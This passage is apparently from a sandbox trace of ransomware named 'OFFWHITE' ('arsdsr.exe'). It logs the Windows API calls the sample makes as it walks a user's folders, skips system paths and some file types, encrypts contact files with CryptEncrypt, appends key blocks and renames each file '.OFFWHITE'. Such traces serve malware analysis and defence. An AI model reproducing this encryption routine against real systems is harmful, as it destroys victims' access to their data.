lpString2="...") returned 1 [0131.767] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="windows") returned -1 [0131.767] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="$recycle.bin") returned 1 [0131.767] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="rsa") returned -1 [0131.767] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="ntuser.dat") returned -1 [0131.767] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="programdata") returned -1 [0131.767] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="appdata") returned -1 [0131.767] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="program files") returned -1 [0131.767] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="program files (x86)") returned -1 [0131.767] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Users\\" | out: lpString1="C:/Users\\") returned="C:/Users\\" [0131.767] lstrcatW (in: lpString1="C:/Users\\", lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz") returned="C:/Users\\5p5NrGJn0jS HALPmcxz" [0131.767] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0131.767] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0131.767] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0131.767] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1a0018, dwReserved1=0x295f6f0, cFileName=".", cAlternateFileName="")) returned 0x544690 [0131.767] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0131.767] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1a0018, dwReserved1=0x295f6f0, cFileName="..", cAlternateFileName="")) returned 1 [0131.767] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0131.767] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0131.768] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1a0018, dwReserved1=0x295f6f0, cFileName="AppData", cAlternateFileName="")) returned 1 [0131.768] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0131.768] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0131.768] lstrcmpiW (lpString1="AppData", lpString2="...") returned 1 [0131.768] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0131.768] lstrcmpiW (lpString1="AppData", lpString2="$recycle.bin") returned 1 [0131.768] lstrcmpiW (lpString1="AppData", lpString2="rsa") returned -1 [0131.768] lstrcmpiW (lpString1="AppData", lpString2="ntuser.dat") returned -1 [0131.768] lstrcmpiW (lpString1="AppData", lpString2="programdata") returned -1 [0131.768] lstrcmpiW (lpString1="AppData", lpString2="appdata") returned 0 [0131.768] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0131.768] lstrcmpiW (lpString1="Application Data", lpString2=".") returned 1 [0131.768] lstrcmpiW (lpString1="Application Data", lpString2="..") returned 1 [0131.768] lstrcmpiW (lpString1="Application Data", lpString2="...") returned 1 [0131.768] lstrcmpiW (lpString1="Application Data", lpString2="windows") returned -1 [0131.768] lstrcmpiW (lpString1="Application Data", lpString2="$recycle.bin") returned 1 [0131.768] lstrcmpiW (lpString1="Application Data", lpString2="rsa") returned -1 [0131.768] lstrcmpiW (lpString1="Application Data", lpString2="ntuser.dat") returned -1 [0131.768] lstrcmpiW (lpString1="Application Data", lpString2="programdata") returned -1 [0131.768] lstrcmpiW (lpString1="Application Data", lpString2="appdata") returned 1 [0131.768] lstrcmpiW (lpString1="Application Data", lpString2="program files") returned -1 [0131.768] lstrcmpiW (lpString1="Application Data", lpString2="program files (x86)") returned -1 [0131.768] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0131.768] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Application Data" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Application Data") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Application Data" [0131.768] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Application Data", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" [0131.768] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\" [0131.768] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*" [0131.768] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x75402522, ftCreationTime.dwLowDateTime=0x295e92c, ftCreationTime.dwHighDateTime=0x208, ftLastAccessTime.dwLowDateTime=0x53fc40, ftLastAccessTime.dwHighDateTime=0x508d58, ftLastWriteTime.dwLowDateTime=0x86, ftLastWriteTime.dwHighDateTime=0x295e954, nFileSizeHigh=0xfd8aae34, nFileSizeLow=0x21, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="￾￿\x02", cAlternateFileName="")) returned 0xffffffff [0131.769] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0131.769] lstrcmpiW (lpString1="Contacts", lpString2=".") returned 1 [0131.770] lstrcmpiW (lpString1="Contacts", lpString2="..") returned 1 [0131.770] lstrcmpiW (lpString1="Contacts", lpString2="...") returned 1 [0131.770] lstrcmpiW (lpString1="Contacts", lpString2="windows") returned -1 [0131.770] lstrcmpiW (lpString1="Contacts", lpString2="$recycle.bin") returned 1 [0131.770] lstrcmpiW (lpString1="Contacts", lpString2="rsa") returned -1 [0131.770] lstrcmpiW (lpString1="Contacts", lpString2="ntuser.dat") returned -1 [0131.770] lstrcmpiW (lpString1="Contacts", lpString2="programdata") returned -1 [0131.770] lstrcmpiW (lpString1="Contacts", lpString2="appdata") returned 1 [0131.770] lstrcmpiW (lpString1="Contacts", lpString2="program files") returned -1 [0131.770] lstrcmpiW (lpString1="Contacts", lpString2="program files (x86)") returned -1 [0131.770] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0131.770] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Contacts" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0131.770] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0131.770] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0131.770] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0131.770] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0131.772] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0131.772] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0131.773] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0131.773] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0131.773] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0131.773] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2=".") returned 1 [0131.773] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="..") returned 1 [0131.773] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="...") returned 1 [0131.773] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="windows") returned -1 [0131.773] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="$recycle.bin") returned 1 [0131.773] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="rsa") returned -1 [0131.773] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="ntuser.dat") returned -1 [0131.773] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="programdata") returned -1 [0131.773] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="appdata") returned -1 [0131.773] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="program files") returned -1 [0131.773] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="program files (x86)") returned -1 [0131.773] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0131.773] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="Aclviho ASldjfl.contact" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" [0131.773] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.773] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.773] PathFindExtensionW (pszPath="Aclviho ASldjfl.contact") returned=".contact" [0131.773] lstrcmpiW (lpString1=".contact", lpString2=".exe") returned -1 [0131.774] lstrcmpiW (lpString1=".contact", lpString2=".log") returned -1 [0131.774] lstrcmpiW (lpString1=".contact", lpString2=".cab") returned 1 [0131.774] lstrcmpiW (lpString1=".contact", lpString2=".cmd") returned 1 [0131.774] lstrcmpiW (lpString1=".contact", lpString2=".com") returned 1 [0131.774] lstrcmpiW (lpString1=".contact", lpString2=".cpl") returned -1 [0131.774] lstrcmpiW (lpString1=".contact", lpString2=".ini") returned -1 [0131.774] lstrcmpiW (lpString1=".contact", lpString2=".dll") returned -1 [0131.774] lstrcmpiW (lpString1=".contact", lpString2=".url") returned -1 [0131.774] lstrcmpiW (lpString1=".contact", lpString2=".ttf") returned -1 [0131.774] lstrcmpiW (lpString1=".contact", lpString2=".mp3") returned -1 [0131.774] lstrcmpiW (lpString1=".contact", lpString2=".pif") returned -1 [0131.774] lstrcmpiW (lpString1=".contact", lpString2=".mp4") returned -1 [0131.774] lstrcmpiW (lpString1=".contact", lpString2=".OFFWHITE") returned -1 [0131.774] lstrcmpiW (lpString1=".contact", lpString2=".msi") returned -1 [0131.774] lstrcmpiW (lpString1="Aclviho ASldjfl.contact", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0131.774] GetProcessHeap () returned 0x500000 [0131.774] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547df8 [0131.774] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0131.775] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1178) returned 1 [0131.775] GetProcessHeap () returned 0x500000 [0131.775] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0131.775] GetProcessHeap () returned 0x500000 [0131.775] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0131.775] GetProcessHeap () returned 0x500000 [0131.775] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0131.776] GetProcessHeap () returned 0x500000 [0131.776] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0131.776] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.776] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.776] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0131.776] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.776] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.776] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0131.776] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.776] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.776] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0131.777] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.777] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.777] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0131.777] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x49a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.777] SetLastError (dwErrCode=0x0) [0131.777] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.779] GetLastError () returned 0x0 [0131.779] GetLastError () returned 0x0 [0131.779] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x59a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.779] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0131.780] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x69a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.780] WriteFile (in: hFile=0xb0, lpBuffer=0x547df8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547df8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0131.780] GetProcessHeap () returned 0x500000 [0131.780] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x49a) returned 0x53f480 [0131.780] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.780] ReadFile (in: hFile=0xb0, lpBuffer=0x53f480, nNumberOfBytesToRead=0x49a, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x53f480*, lpNumberOfBytesRead=0x295e540*=0x49a, lpOverlapped=0x0) returned 1 [0131.780] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.780] WriteFile (in: hFile=0xb0, lpBuffer=0x53f480*, nNumberOfBytesToWrite=0x49a, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f480*, lpNumberOfBytesWritten=0x295e54c*=0x49a, lpOverlapped=0x0) returned 1 [0131.780] GetProcessHeap () returned 0x500000 [0131.780] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x53f480 | out: hHeap=0x500000) returned 1 [0131.780] CloseHandle (hObject=0xb0) returned 1 [0131.784] GetProcessHeap () returned 0x500000 [0131.784] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0131.784] GetProcessHeap () returned 0x500000 [0131.785] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0131.785] GetProcessHeap () returned 0x500000 [0131.785] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0131.785] GetProcessHeap () returned 0x500000 [0131.785] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0131.785] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" [0131.785] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.OFFWHITE" [0131.785] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.offwhite")) returned 1 [0131.786] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0131.786] lstrcmpiW (lpString1="Administrator.contact", lpString2=".") returned 1 [0131.786] lstrcmpiW (lpString1="Administrator.contact", lpString2="..") returned 1 [0131.786] lstrcmpiW (lpString1="Administrator.contact", lpString2="...") returned 1 [0131.786] lstrcmpiW (lpString1="Administrator.contact", lpString2="windows") returned -1 [0131.786] lstrcmpiW (lpString1="Administrator.contact", lpString2="$recycle.bin") returned 1 [0131.786] lstrcmpiW (lpString1="Administrator.contact", lpString2="rsa") returned -1 [0131.786] lstrcmpiW (lpString1="Administrator.contact", lpString2="ntuser.dat") returned -1 [0131.786] lstrcmpiW (lpString1="Administrator.contact", lpString2="programdata") returned -1 [0131.787] lstrcmpiW (lpString1="Administrator.contact", lpString2="appdata") returned -1 [0131.787] lstrcmpiW (lpString1="Administrator.contact", lpString2="program files") returned -1 [0131.787] lstrcmpiW (lpString1="Administrator.contact", lpString2="program files (x86)") returned -1 [0131.787] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0131.787] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="Administrator.contact" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" [0131.787] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.787] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.787] PathFindExtensionW (pszPath="Administrator.contact") returned=".contact" [0131.787] lstrcmpiW (lpString1=".contact", lpString2=".exe") returned -1 [0131.787] lstrcmpiW (lpString1=".contact", lpString2=".log") returned -1 [0131.787] lstrcmpiW (lpString1=".contact", lpString2=".cab") returned 1 [0131.787] lstrcmpiW (lpString1=".contact", lpString2=".cmd") returned 1 [0131.787] lstrcmpiW (lpString1=".contact", lpString2=".com") returned 1 [0131.787] lstrcmpiW (lpString1=".contact", lpString2=".cpl") returned -1 [0131.787] lstrcmpiW (lpString1=".contact", lpString2=".ini") returned -1 [0131.787] lstrcmpiW (lpString1=".contact", lpString2=".dll") returned -1 [0131.787] lstrcmpiW (lpString1=".contact", lpString2=".url") returned -1 [0131.787] lstrcmpiW (lpString1=".contact", lpString2=".ttf") returned -1 [0131.787] lstrcmpiW (lpString1=".contact", lpString2=".mp3") returned -1 [0131.787] lstrcmpiW (lpString1=".contact", lpString2=".pif") returned -1 [0131.787] lstrcmpiW (lpString1=".contact", lpString2=".mp4") returned -1 [0131.787] lstrcmpiW (lpString1=".contact", lpString2=".OFFWHITE") returned -1 [0131.787] lstrcmpiW (lpString1=".contact", lpString2=".msi") returned -1 [0131.787] lstrcmpiW (lpString1="Administrator.contact", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0131.787] GetProcessHeap () returned 0x500000 [0131.787] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547e08 [0131.787] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0131.788] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=68382) returned 1 [0131.788] GetProcessHeap () returned 0x500000 [0131.788] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0131.788] GetProcessHeap () returned 0x500000 [0131.788] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0131.788] GetProcessHeap () returned 0x500000 [0131.788] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0131.788] GetProcessHeap () returned 0x500000 [0131.788] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0131.789] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0131.789] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0131.789] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0131.789] lstrcmpiW 